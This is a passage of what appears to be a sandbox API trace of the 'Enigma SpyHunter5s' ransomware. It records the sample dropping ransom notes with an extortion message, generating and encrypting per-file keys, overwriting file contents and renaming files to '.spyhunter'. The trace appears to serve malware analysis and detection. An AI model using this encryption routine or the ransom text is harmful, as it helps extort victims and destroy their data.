[0077.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x248) returned 0x2d71d8 [0078.000] wnsprintfW (in: pszDest=0x2d71d8, cchDest=260, pszFmt="\\\\?\\%c:" | out: pszDest="\\\\?\\C:") returned 6 [0078.000] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x403244, lpParameter=0x2d71d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa0 [0078.000] WaitForMultipleObjects (nCount=0x2, lpHandles=0x18f9d0*=0x9c, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0142.489] CloseHandle (hObject=0x9c) returned 1 [0142.489] CloseHandle (hObject=0xa0) returned 1 [0142.489] Sleep (dwMilliseconds=0x1f4) [0143.005] Sleep (dwMilliseconds=0x1f4) [0143.558] Sleep (dwMilliseconds=0x1f4) [0144.070] Sleep (dwMilliseconds=0x1f4) [0144.578] Sleep (dwMilliseconds=0x1f4) [0145.291] Sleep (dwMilliseconds=0x1f4) [0145.873] Sleep (dwMilliseconds=0x1f4) [0146.391] Sleep (dwMilliseconds=0x1f4) [0146.902] Sleep (dwMilliseconds=0x1f4) [0147.549] Sleep (dwMilliseconds=0x1f4) [0148.093] Sleep (dwMilliseconds=0x1f4) [0148.603] Sleep (dwMilliseconds=0x1f4) [0149.201] Sleep (dwMilliseconds=0x1f4) [0149.724] Sleep (dwMilliseconds=0x1f4) [0150.229] Sleep (dwMilliseconds=0x1f4) [0150.819] Sleep (dwMilliseconds=0x1f4) [0151.333] Sleep (dwMilliseconds=0x1f4) [0151.858] Sleep (dwMilliseconds=0x1f4) [0152.363] Sleep (dwMilliseconds=0x1f4) [0152.877] Sleep (dwMilliseconds=0x1f4) [0153.392] Sleep (dwMilliseconds=0x1f4) [0153.909] Sleep (dwMilliseconds=0x1f4) [0154.427] Sleep (dwMilliseconds=0x1f4) [0154.966] Sleep (dwMilliseconds=0x1f4) [0155.467] Sleep (dwMilliseconds=0x1f4) [0156.017] Sleep (dwMilliseconds=0x1f4) [0156.584] Sleep (dwMilliseconds=0x1f4) [0157.089] Sleep (dwMilliseconds=0x1f4) [0157.604] Sleep (dwMilliseconds=0x1f4) [0158.119] Sleep (dwMilliseconds=0x1f4) [0158.634] Sleep (dwMilliseconds=0x1f4) [0159.219] Sleep (dwMilliseconds=0x1f4) [0159.725] Sleep (dwMilliseconds=0x1f4) [0160.412] Sleep (dwMilliseconds=0x1f4) [0160.927] Sleep (dwMilliseconds=0x1f4) [0161.446] Sleep (dwMilliseconds=0x1f4) [0161.967] Sleep (dwMilliseconds=0x1f4) [0162.474] Sleep (dwMilliseconds=0x1f4) [0162.986] Sleep (dwMilliseconds=0x1f4) [0163.501] Sleep (dwMilliseconds=0x1f4) [0164.016] Sleep (dwMilliseconds=0x1f4) [0164.530] Sleep (dwMilliseconds=0x1f4) [0165.045] Sleep (dwMilliseconds=0x1f4) [0165.560] Sleep (dwMilliseconds=0x1f4) [0166.075] Sleep (dwMilliseconds=0x1f4) [0166.590] Sleep (dwMilliseconds=0x1f4) [0167.104] Sleep (dwMilliseconds=0x1f4) [0167.619] Sleep (dwMilliseconds=0x1f4) [0168.134] Sleep (dwMilliseconds=0x1f4) [0168.649] Sleep (dwMilliseconds=0x1f4) [0169.164] Sleep (dwMilliseconds=0x1f4) [0169.687] Sleep (dwMilliseconds=0x1f4) [0170.197] Sleep (dwMilliseconds=0x1f4) [0170.753] Sleep (dwMilliseconds=0x1f4) [0171.254] Sleep (dwMilliseconds=0x1f4) [0171.797] Sleep (dwMilliseconds=0x1f4) [0172.302] Sleep (dwMilliseconds=0x1f4) [0172.936] Sleep (dwMilliseconds=0x1f4) [0173.444] Sleep (dwMilliseconds=0x1f4) [0174.000] Sleep (dwMilliseconds=0x1f4) [0174.554] Sleep (dwMilliseconds=0x1f4) [0175.220] Sleep (dwMilliseconds=0x1f4) [0175.743] Sleep (dwMilliseconds=0x1f4) [0176.246] Sleep (dwMilliseconds=0x1f4) [0176.761] Sleep (dwMilliseconds=0x1f4) [0177.285] Sleep (dwMilliseconds=0x1f4) [0177.793] Sleep (dwMilliseconds=0x1f4) [0178.305] Sleep (dwMilliseconds=0x1f4) [0178.820] Sleep (dwMilliseconds=0x1f4) [0179.335] Sleep (dwMilliseconds=0x1f4) [0179.890] Sleep (dwMilliseconds=0x1f4) [0180.396] Sleep (dwMilliseconds=0x1f4) Thread: id = 5 os_tid = 0xabc [0078.044] Sleep (dwMilliseconds=0x3e8) [0081.586] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc8 [0081.588] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0081.588] WriteFile (in: hFile=0xc8, lpBuffer=0x57fe43*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ff6c, lpOverlapped=0x0 | out: lpBuffer=0x57fe43*, lpNumberOfBytesWritten=0x57ff6c*=0x127, lpOverlapped=0x0) returned 1 [0081.589] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0081.589] WriteFile (in: hFile=0xc8, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ff6c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ff6c*=0x2ac, lpOverlapped=0x0) returned 1 [0081.589] CloseHandle (hObject=0xc8) returned 1 [0081.590] GetProcessHeap () returned 0x2c0000 [0081.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320590 | out: hHeap=0x2c0000) returned 1 [0081.591] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\$HOWDECRYPT$.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc8 [0081.591] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0081.591] WriteFile (in: hFile=0xc8, lpBuffer=0x57fe3f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ff68, lpOverlapped=0x0 | out: lpBuffer=0x57fe3f*, lpNumberOfBytesWritten=0x57ff68*=0x127, lpOverlapped=0x0) returned 1 [0081.592] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0081.592] WriteFile (in: hFile=0xc8, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ff68, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ff68*=0x2ac, lpOverlapped=0x0) returned 1 [0081.593] CloseHandle (hObject=0xc8) returned 1 [0081.593] GetProcessHeap () returned 0x2c0000 [0081.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320d28 | out: hHeap=0x2c0000) returned 1 [0081.593] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ff08 | out: pbBuffer=0x57ff08) returned 1 [0081.875] GetProcessHeap () returned 0x2c0000 [0081.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30c700 [0081.875] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30c700*, pdwDataLen=0x57ff00*=0x20, dwBufLen=0x30 | out: pbData=0x30c700*, pdwDataLen=0x57ff00*=0x30) returned 1 [0081.875] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0081.875] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0081.875] StrStrW (lpFirst="Proof.xml", lpSrch=".txt") returned 0x0 [0081.875] GetProcessHeap () returned 0x2c0000 [0081.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x331698 [0081.875] ReadFile (in: hFile=0xd0, lpBuffer=0x331698, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fec4, lpOverlapped=0x0 | out: lpBuffer=0x331698*, lpNumberOfBytesRead=0x57fec4*=0x5b2, lpOverlapped=0x0) returned 1 [0082.017] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0xfffffa4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.017] WriteFile (in: hFile=0xd0, lpBuffer=0x331698*, nNumberOfBytesToWrite=0x5b2, lpNumberOfBytesWritten=0x57fec4, lpOverlapped=0x0 | out: lpBuffer=0x331698*, lpNumberOfBytesWritten=0x57fec4*=0x5b2, lpOverlapped=0x0) returned 1 [0082.017] GetProcessHeap () returned 0x2c0000 [0082.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x331698 | out: hHeap=0x2c0000) returned 1 [0082.018] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.018] WriteFile (in: hFile=0xd0, lpBuffer=0x57ff04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fec4, lpOverlapped=0x0 | out: lpBuffer=0x57ff04*, lpNumberOfBytesWritten=0x57fec4*=0x4, lpOverlapped=0x0) returned 1 [0082.018] WriteFile (in: hFile=0xd0, lpBuffer=0x30c700*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fec4, lpOverlapped=0x0 | out: lpBuffer=0x30c700*, lpNumberOfBytesWritten=0x57fec4*=0x30, lpOverlapped=0x0) returned 1 [0082.018] CloseHandle (hObject=0xd0) returned 1 [0082.019] GetProcessHeap () returned 0x2c0000 [0082.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0082.019] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.spyhunter") returned 95 [0082.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.spyhunter")) returned 1 [0082.020] GetProcessHeap () returned 0x2c0000 [0082.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0082.020] GetProcessHeap () returned 0x2c0000 [0082.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30c700 | out: hHeap=0x2c0000) returned 1 [0082.020] GetProcessHeap () returned 0x2c0000 [0082.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320868 | out: hHeap=0x2c0000) returned 1 [0082.020] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ff00 | out: pbBuffer=0x57ff00) returned 1 [0082.020] GetProcessHeap () returned 0x2c0000 [0082.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30c700 [0082.020] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30c700*, pdwDataLen=0x57fef8*=0x20, dwBufLen=0x30 | out: pbData=0x30c700*, pdwDataLen=0x57fef8*=0x30) returned 1 [0082.020] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc8 [0082.024] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0082.024] StrStrW (lpFirst="OneNoteMUI.xml", lpSrch=".txt") returned 0x0 [0082.024] GetProcessHeap () returned 0x2c0000 [0082.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x330e50 [0082.024] ReadFile (in: hFile=0xc8, lpBuffer=0x330e50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57febc, lpOverlapped=0x0 | out: lpBuffer=0x330e50*, lpNumberOfBytesRead=0x57febc*=0x646, lpOverlapped=0x0) returned 1 [0082.099] SetFilePointerEx (in: hFile=0xc8, liDistanceToMove=0xfffff9ba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.099] WriteFile (in: hFile=0xc8, lpBuffer=0x330e50*, nNumberOfBytesToWrite=0x646, lpNumberOfBytesWritten=0x57febc, lpOverlapped=0x0 | out: lpBuffer=0x330e50*, lpNumberOfBytesWritten=0x57febc*=0x646, lpOverlapped=0x0) returned 1 [0082.100] GetProcessHeap () returned 0x2c0000 [0082.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330e50 | out: hHeap=0x2c0000) returned 1 [0082.101] SetFilePointerEx (in: hFile=0xc8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.101] WriteFile (in: hFile=0xc8, lpBuffer=0x57fefc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57febc, lpOverlapped=0x0 | out: lpBuffer=0x57fefc*, lpNumberOfBytesWritten=0x57febc*=0x4, lpOverlapped=0x0) returned 1 [0082.101] WriteFile (in: hFile=0xc8, lpBuffer=0x30c700*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57febc, lpOverlapped=0x0 | out: lpBuffer=0x30c700*, lpNumberOfBytesWritten=0x57febc*=0x30, lpOverlapped=0x0) returned 1 [0082.101] CloseHandle (hObject=0xc8) returned 1 [0082.102] GetProcessHeap () returned 0x2c0000 [0082.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0082.103] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.spyhunter") returned 91 [0082.103] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.spyhunter")) returned 1 [0082.104] GetProcessHeap () returned 0x2c0000 [0082.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0082.104] GetProcessHeap () returned 0x2c0000 [0082.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30c700 | out: hHeap=0x2c0000) returned 1 [0082.104] GetProcessHeap () returned 0x2c0000 [0082.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x327dd8 | out: hHeap=0x2c0000) returned 1 [0082.104] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ff00 | out: pbBuffer=0x57ff00) returned 1 [0082.104] GetProcessHeap () returned 0x2c0000 [0082.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30c700 [0082.104] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30c700*, pdwDataLen=0x57fef8*=0x20, dwBufLen=0x30 | out: pbData=0x30c700*, pdwDataLen=0x57fef8*=0x30) returned 1 [0082.104] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc8 [0082.153] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 77 [0082.153] StrStrW (lpFirst="ProjLR.cab", lpSrch=".txt") returned 0x0 [0082.153] GetProcessHeap () returned 0x2c0000 [0082.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32e608 [0082.153] ReadFile (in: hFile=0xc8, lpBuffer=0x32e608, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57febc, lpOverlapped=0x0 | out: lpBuffer=0x32e608*, lpNumberOfBytesRead=0x57febc*=0x2800, lpOverlapped=0x0) returned 1 [0082.600] SetFilePointerEx (in: hFile=0xc8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.600] WriteFile (in: hFile=0xc8, lpBuffer=0x32e608*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57febc, lpOverlapped=0x0 | out: lpBuffer=0x32e608*, lpNumberOfBytesWritten=0x57febc*=0x2800, lpOverlapped=0x0) returned 1 [0082.600] GetProcessHeap () returned 0x2c0000 [0082.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e608 | out: hHeap=0x2c0000) returned 1 [0082.601] SetFilePointerEx (in: hFile=0xc8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.601] WriteFile (in: hFile=0xc8, lpBuffer=0x57fefc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57febc, lpOverlapped=0x0 | out: lpBuffer=0x57fefc*, lpNumberOfBytesWritten=0x57febc*=0x4, lpOverlapped=0x0) returned 1 [0082.935] WriteFile (in: hFile=0xc8, lpBuffer=0x30c700*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57febc, lpOverlapped=0x0 | out: lpBuffer=0x30c700*, lpNumberOfBytesWritten=0x57febc*=0x30, lpOverlapped=0x0) returned 1 [0082.935] CloseHandle (hObject=0xc8) returned 1 [0083.914] GetProcessHeap () returned 0x2c0000 [0083.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x34f030 [0083.915] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.spyhunter") returned 87 [0083.915] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.spyhunter")) returned 1 [0083.916] GetProcessHeap () returned 0x2c0000 [0083.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f030 | out: hHeap=0x2c0000) returned 1 [0083.916] GetProcessHeap () returned 0x2c0000 [0083.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30c700 | out: hHeap=0x2c0000) returned 1 [0083.916] GetProcessHeap () returned 0x2c0000 [0083.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326600 | out: hHeap=0x2c0000) returned 1 [0083.916] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fef8 | out: pbBuffer=0x57fef8) returned 1 [0083.916] GetProcessHeap () returned 0x2c0000 [0083.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x335d88 [0083.916] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x335d88*, pdwDataLen=0x57fef0*=0x20, dwBufLen=0x30 | out: pbData=0x335d88*, pdwDataLen=0x57fef0*=0x30) returned 1 [0083.916] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc8 [0083.916] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 78 [0083.916] StrStrW (lpFirst="msvcr90.dll", lpSrch=".txt") returned 0x0 [0083.916] GetProcessHeap () returned 0x2c0000 [0083.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32fb18 [0083.916] ReadFile (in: hFile=0xc8, lpBuffer=0x32fb18, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57feb4, lpOverlapped=0x0 | out: lpBuffer=0x32fb18*, lpNumberOfBytesRead=0x57feb4*=0x2800, lpOverlapped=0x0) returned 1 [0083.957] SetFilePointerEx (in: hFile=0xc8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.957] WriteFile (in: hFile=0xc8, lpBuffer=0x32fb18*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57feb4, lpOverlapped=0x0 | out: lpBuffer=0x32fb18*, lpNumberOfBytesWritten=0x57feb4*=0x2800, lpOverlapped=0x0) returned 1 [0083.957] GetProcessHeap () returned 0x2c0000 [0083.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fb18 | out: hHeap=0x2c0000) returned 1 [0083.958] SetFilePointerEx (in: hFile=0xc8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.958] WriteFile (in: hFile=0xc8, lpBuffer=0x57fef4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57feb4, lpOverlapped=0x0 | out: lpBuffer=0x57fef4*, lpNumberOfBytesWritten=0x57feb4*=0x4, lpOverlapped=0x0) returned 1 [0084.099] WriteFile (in: hFile=0xc8, lpBuffer=0x335d88*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57feb4, lpOverlapped=0x0 | out: lpBuffer=0x335d88*, lpNumberOfBytesWritten=0x57feb4*=0x30, lpOverlapped=0x0) returned 1 [0084.099] CloseHandle (hObject=0xc8) returned 1 [0084.458] GetProcessHeap () returned 0x2c0000 [0084.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0084.458] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.spyhunter") returned 88 [0084.458] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.spyhunter")) returned 1 [0084.459] GetProcessHeap () returned 0x2c0000 [0084.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0084.459] GetProcessHeap () returned 0x2c0000 [0084.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x335d88 | out: hHeap=0x2c0000) returned 1 [0084.459] GetProcessHeap () returned 0x2c0000 [0084.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3269a0 | out: hHeap=0x2c0000) returned 1 [0084.459] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fef8 | out: pbBuffer=0x57fef8) returned 1 [0084.459] GetProcessHeap () returned 0x2c0000 [0084.459] 